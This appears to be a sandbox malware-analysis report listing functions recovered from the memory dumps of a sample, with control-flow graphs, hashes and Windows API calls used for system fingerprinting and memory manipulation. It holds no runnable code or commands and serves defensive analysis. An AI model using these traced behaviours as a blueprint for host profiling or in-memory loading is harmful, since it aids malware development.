                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c000a3c2461e9e5ff3e5c16150a6429e8a459f13b699af849664cba5e88922ba
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8ee9bdf370e86ae927a6670e1c37baa0d3cef51172a81aac1b92dea30f15acef
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c000a3c2461e9e5ff3e5c16150a6429e8a459f13b699af849664cba5e88922ba
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08B15D70E042199FDF14CFADD986BADBBF2BF88314F148129D815E7294EB749842CB81
                                                                                                                                                                                                                                                                                                                                  Function 05A20BE0 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e534d02da3255feccdd68e9dcda99f59eee47921871154cbcd487a2681082305
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6f22f95283ee1b00feb3f69100f193b24154ff2531b6ec8f3a7792fec8331820
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e534d02da3255feccdd68e9dcda99f59eee47921871154cbcd487a2681082305
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0916170E00219DFDF14CFADC98ABADBBF2BF88314F148529D415A7254EB749886CB91
                                                                                                                                                                                                                                                                                                                                  Function 0082CE90 Relevance: 16.2, APIs: 10, Instructions: 1202COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7cc52ea85ae376e1577cf847c9549a8c368cb66ff2051dadd46fac98a618722a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 562e1bf9b59fdba70bd29e99110de5cb4afc9e6447d2b20f2a0f19f0b1b739d0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cc52ea85ae376e1577cf847c9549a8c368cb66ff2051dadd46fac98a618722a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42A28A7190D3A08FC735CB18E8447AABFE1FFD5318F094A59E498D7292D374A8848B97
                                                                                                                                                                                                                                                                                                                                  Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 1799 40af66-40af6e 1800 40af7d-40af88 call 40b84d 1799->1800 1803 40af70-40af7b call 40d2e3 1800->1803 1804 40af8a-40af8b 1800->1804 1803->1800 1807 40af8c-40af98 1803->1807 1808 40afb3-40afca call 40af49 call 40cd39 1807->1808 1809 40af9a-40afb2 call 40aefc call 40d2bd 1807->1809 1809->1808
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                                                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1411284514-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                                                                                                                                                                                  Function 00847DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 1902 847df0-847dfa 1903 847e00 1902->1903 1904 848288-84829a call 830d80 1902->1904 1903->1904 1906 847e06-847e15 GetComputerNameW 1903->1906 1911 8482a0 1904->1911 1912 84851e-84852d call 830d80 1904->1912 1908 8482b6-8482bb 1906->1908 1909 847e1b 1906->1909 1909->1908 1910 847e21-847e2d 1909->1910 1911->1912 1914 8482a6 1911->1914 1916 847dbc-847dce 1914->1916 1917 8482ac 1914->1917 1924 847d35 1916->1924 1925 847d6c-847d80 GetVolumeInformationW 1916->1925 1920 847d20-847d2b 1917->1920 1921 8482b2-8482b4 1917->1921 1922 847d61-847d68 1920->1922 1923 847d2d-847d94 1920->1923 1921->1908 1928 847de5-847dea 1922->1928 1929 847d6a 1922->1929 1923->1922 1933 847d96 1923->1933 1924->1925 1927 847d37-847d39 1924->1927 1930 847d3b-847d46 1927->1930 1931 847d83-847d8c GetWindowsDirectoryW 1928->1931 1932 847dec 1928->1932 1929->1925 1929->1928 1934 847d97-847d98 1930->1934 1935 847d48-847dac 1930->1935 1931->1930 1937 847d8e-847da6 1931->1937 1932->1931 1936 847dee 1932->1936 1933->1934 1938 847de2 1934->1938 1939 847d9a-847d9f 1934->1939 1935->1934 1943 847dae-847db3 1935->1943 1936->1902 1937->1916 1942 847da8 1937->1942 1942->1916 1944 847daa-847dba 1942->1944 1944->1916
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ComputerName
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3545744682-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8928bbf2cf7ddbedece99d215b9dc670189837cfc5d8fb9d8046d4a6e55d5bc6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 570e9ee23c39a459ec21aa8ecabdf160e921d334fec0171ba53f548df9349884
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8928bbf2cf7ddbedece99d215b9dc670189837cfc5d8fb9d8046d4a6e55d5bc6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F210A70E6D34CAFE63557148C06BB93A34FFA1710F854446F598D62DAD7AC2C0886A3
                                                                                                                                                                                                                                                                                                                                  Function 00825A3B Relevance: 3.1, APIs: 2, Instructions: 60threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 1996 825a3b-825a3f 1997 825a45 1996->1997 1998 824f7c 1996->1998 1999 825a4b-825a53 CreateThread 1997->1999 2000 8251ae-8251d6 1997->2000 2001 824f82 1998->2001 2002 825054-82505d call 825d20 1998->2002 2003 825a59-825b3c RtlExitUserThread call 825d20 1999->2003 2001->2002 2004 824f88-824f91 2001->2004 2018 825b42 2003->2018 2019 825cd3-825cdb 2003->2019 2018->2019 2020 825b48-825b6f 2018->2020 2025 825b71 2020->2025 2025->2025
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,008255C0,?,00000000,00000000), ref: 00825A51
                                                                                                                                                                                                                                                                                                                                  • RtlExitUserThread.NTDLL(00000000), ref: 00825B11
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Thread$CreateExitUser
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4108186749-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a8e0736a84b34e0bc23611d9c0d5f589541c59e2272a52d2c19994e8375dcdb4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c40aa1ed04fd4fe558c3d1c9d16d1255b09cfc7448ef0c30a2063fd2d8e68e85
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8e0736a84b34e0bc23611d9c0d5f589541c59e2272a52d2c19994e8375dcdb4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B11591158DBE14FD7238B28A8257667FA0BF63734F1902C6D0A0CE1E3D2794D8893A3
                                                                                                                                                                                                                                                                                                                                  Function 06920040 Relevance: 2.9, Strings: 2, Instructions: 417COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 2194 6920040-6920062 2195 6920064-6920067 2194->2195 2196 69200a3-69200a6 2195->2196 2197 6920069-692009e 2195->2197 2198 69200c6-69200c9 2196->2198 2199 69200a8-69200bb 2196->2199 2197->2196 2202 69200d7-69200da 2198->2202 2203 69200cb-69200d2 2198->2203 2200 69200c1 2199->2200 2201 69201c5-69201cc 2199->2201 2200->2198 2206 69201d1-69201d4 2201->2206 2204 69200ef-69200f2 2202->2204 2205 69200dc-69200ea 2202->2205 2203->2202 2207 69200f4-6920115 2204->2207 2208 692011a-692011d 2204->2208 2205->2204 2209 69201d6-69201dd 2206->2209 2210 69201e8-69201eb 2206->2210 2207->2208 2214 692013a-692013d 2208->2214 2215 692011f-6920135 2208->2215 2212 69201e3 2209->2212 2213 69204d8-6920513 2209->2213 2216 69201f1-69201f4 2210->2216 2217 692013f-6920143 2210->2217 2212->2210 2248 6920525 2213->2248 2249 6920515-6920523 2213->2249 2214->2217 2218 692014e-6920151 2214->2218 2215->2214 2221 69201f6-6920207 2216->2221 2222 692020c-692020f 2216->2222 2217->2213 2219 6920149 2217->2219 2224 6920153-69201bb 2218->2224 2225 69201c0-69201c3 2218->2225 2219->2218 2221->2222 2227 6920232-6920235 2222->2227 2228 6920211-692022d 2222->2228 2224->2225 2225->2201 2225->2206 2229 6920237-6920250 2227->2229 2230 6920255-6920258 2227->2230 2228->2227 2229->2230 2236 69202d5-69202d8 2230->2236 2237 692025a-69202d0 2230->2237 2240 69202f5-69202f8 2236->2240 2241 69202da-69202f0 2236->2241 2237->2236 2243 6920310-6920313 2240->2243 2244 69202fa-692030b 2240->2244 2241->2240 2250 6920315-692031a 2243->2250 2251 692031d-6920320 2243->2251 2244->2243 2261 692052d-6920542 2248->2261 2249->2261 2250->2251 2255 6920322-6920338 2251->2255 2256 692033d-6920340 2251->2256 2255->2256 2262 6920342-6920349 2256->2262 2263 692034c-692034f 2256->2263 2287 6920554 2261->2287 2288 6920544-6920552 2261->2288 2265 6920351-692035b 2263->2265 2266 6920366-6920369 2263->2266 2265->2207 2280 6920361 2265->2280 2269 692036b-6920388 2266->2269 2270 692038d-6920390 2266->2270 2269->2270 2276 6920392-69203a7 2270->2276 2277 69203ac-69203af 2270->2277 2276->2277 2278 69203b1-69203d2 2277->2278 2279 69203d7-69203d9 2277->2279 2278->2279 2285 69203e0-69203e3 2279->2285 2286 69203db 2279->2286 2280->2266 2285->2195 2291 69203e9-69203f8 2285->2291 2286->2285 2296 692055c-692059c 2287->2296 2288->2296 2300 69204c0-69204d5 2291->2300 2301 69203fe-69204ba 2291->2301 2314 69205a4-69205d7 2296->2314 2300->2213 2301->2300 2322 69205e4 2314->2322 2323 69205d9-69205de 2314->2323 2325 69205e5 2322->2325 2323->2322 2325->2325
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: Te]q$Te]q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-3320153681
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 49d57abe7c0b67cb0a962915fb54ac15071abc3b39fb8c82f55ed27bc8081db1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7ffb23f5f176c64effba11db7ed3257910e7b7964c233471f6fd4d1c7367edc9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49d57abe7c0b67cb0a962915fb54ac15071abc3b39fb8c82f55ed27bc8081db1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82F16A30E002198FDB64DB68C490BADB7B6FF89300F60856AD409EB795DB75DC46CB91
                                                                                                                                                                                                                                                                                                                                  Function 069219F0 Relevance: 2.7, Strings: 2, Instructions: 217COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 2911 69219f0-6921a1f 2912 6921a25-6921a2e 2911->2912 2913 6921bda-6921bfe 2911->2913 2916 6921a34-6921a89 2912->2916 2917 6921c05-6921ca0 call 69218a8 2912->2917 2913->2917 2926 6921ab3-6921abc 2916->2926 2927 6921a8b-6921ab0 2916->2927 2963 6921ca5-6921caa 2917->2963 2929 6921ac1-6921ad1 2926->2929 2930 6921abe 2926->2930 2927->2926 2969 6921ad3 call 6921c50 2929->2969 2970 6921ad3 call 6921be0 2929->2970 2971 6921ad3 call 69219f0 2929->2971 2930->2929 2933 6921ad9-6921adb 2936 6921b35-6921b82 2933->2936 2937 6921add-6921ae2 2933->2937 2950 6921b89-6921b8e 2936->2950 2939 6921ae4-6921b19 2937->2939 2940 6921b1b-6921b2e 2937->2940 2939->2950 2940->2936 2951 6921b90 2950->2951 2952 6921b98-6921b9d 2950->2952 2951->2952 2954 6921ba7-6921bac 2952->2954 2955 6921b9f 2952->2955 2958 6921bc1 2954->2958 2959 6921bae-6921bbc call 692171c call 6921734 2954->2959 2955->2954 2958->2913 2959->2958 2969->2933 2970->2933 2971->2933
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: (&]q$(aq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1602648543
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2e85d3ca6d3f73e0d1abf97a53fa982539c4ab48ea2ee0d2e65e3ac196310cf3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dce580f5707814c7e1568a0d4f0a31b8891b2a481203fb726dbc6945033dc874
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e85d3ca6d3f73e0d1abf97a53fa982539c4ab48ea2ee0d2e65e3ac196310cf3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73719131F002199FDB55DFA9C8906EEBBF6AF88700F14856AE505A7384DF30AD02CB91
                                                                                                                                                                                                                                                                                                                                  Function 06921138 Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 3059 6921138-6921145 3060 69211a7-692121c 3059->3060 3061 6921147-692114b 3059->3061 3079 692121e-6921221 3060->3079 3062 6921166-6921169 3061->3062 3063 692114d-6921165 3061->3063 3064 69211a1-69211a6 3062->3064 3065 692116b-692117d 3062->3065 3071 6921184 3065->3071 3072 692117f-6921182 3065->3072 3074 6921186-692119a 3071->3074 3072->3074 3074->3064 3080 6921223-692122b 3079->3080 3081 692122c-692122f 3079->3081 3082 6921231-692123f 3081->3082 3083 6921246-6921249 3081->3083 3089 6921241 3082->3089 3090 6921287-69212d3 3082->3090 3084 6921265-6921268 3083->3084 3085 692124b-6921260 3083->3085 3086 692126a-6921279 3084->3086 3087 692127e-6921281 3084->3087 3085->3084 3086->3087 3087->3090 3092 692141e-6921420 3087->3092 3089->3083 3105 69212db-69212dd 3090->3105 3094 6921422 3092->3094 3095 6921427-692142a 3092->3095 3094->3095 3095->3079 3097 6921430-6921439 3095->3097 3106 6921372-6921396 3105->3106 3107 69212e3-69212ed 3105->3107 3115 69213a0-69213a1 3106->3115 3116 6921398 3106->3116 3110 6921305-692130b 3107->3110 3111 69212ef-69212f5 3107->3111 3117 6921362-692136c 3110->3117 3118 692130d-6921341 3110->3118 3113 69212f7 3111->3113 3114 69212f9-69212fb 3111->3114 3113->3110 3114->3110 3115->3092 3116->3115 3117->3106 3117->3107 3118->3117
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: PH]q$U
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1399991065
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ef6311effb2b9201c59aaf9d7caa3d4cb1f8b3aed2ca569fa155167820982be5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f0fabf00e38c37138bf2326e09d835734591dd8e3806edb3d776117dc4f4e78c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef6311effb2b9201c59aaf9d7caa3d4cb1f8b3aed2ca569fa155167820982be5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF512631F001668BDB599AB894503AE7AEBEFC5750F244869D20ADB798DE30CC52C7D1
                                                                                                                                                                                                                                                                                                                                  Function 00825D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00825D6D
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 35c061941818d34a2dede8a56622738affb7a9f989e6e84a6a569f5a0774aeab
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5206d09cef25c4e7e08d54f649ebbd411811fb9edb3d01c1fd98ffbbd0bbea3c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35c061941818d34a2dede8a56622738affb7a9f989e6e84a6a569f5a0774aeab
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4F09055AC4F30BBEA3E0364F94DB702A60FB22728F0D5075F245E90B286766CC5C902
                                                                                                                                                                                                                                                                                                                                  Function 059AFE97 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 059AFF17
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414188038.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_59a0000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1890195054-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0ffaa13602fa37cd23e6331e93b54dbaf55d6f36e1fad8750b27023accb2f263
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2c408746ac8c27612b5c1f97dae2c8e1257900f9e6cf18c78bc30920de8f8a30
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ffaa13602fa37cd23e6331e93b54dbaf55d6f36e1fad8750b27023accb2f263
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D2142B2C052999FCB10CFAAD444A9EFBB4EF49310F10816AE418A7250D738A944CFE5
                                                                                                                                                                                                                                                                                                                                  Function 02CC9130 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 02CC91A4
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2398097932.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_2cc0000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c542a06071af78301412ef5bf519a2d03f22f368f5f81335599b5e5eaa76c4c1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 685f779c447c271958a12483e5ce66e7c7c050d3f84e6064bb97b98454039cef
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c542a06071af78301412ef5bf519a2d03f22f368f5f81335599b5e5eaa76c4c1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B11F7B1D002099FDB10DFAAC945AAFFBF5FF49314F108419D419A7250C779A945CFA1
                                                                                                                                                                                                                                                                                                                                  Function 059AFEB0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 059AFF17
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414188038.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_59a0000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                                                                                                  • String ID:
